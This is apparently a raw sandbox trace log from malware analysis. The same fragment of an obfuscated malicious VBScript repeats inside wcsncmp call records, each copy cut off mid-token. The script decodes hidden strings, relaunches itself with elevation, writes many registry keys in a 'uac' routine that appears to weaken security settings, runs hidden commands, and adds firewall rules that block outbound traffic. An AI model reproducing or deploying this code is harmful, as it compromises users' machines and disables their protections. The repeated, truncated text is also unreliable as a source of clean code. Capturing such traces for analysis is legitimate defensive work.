CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.365] wcsncmp (_String1="TFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.365] wcsncmp (_String1="FEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.366] wcsncmp (_String1="EEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.366] wcsncmp (_String1="EUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.366] wcsncmp (_String1="UEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd 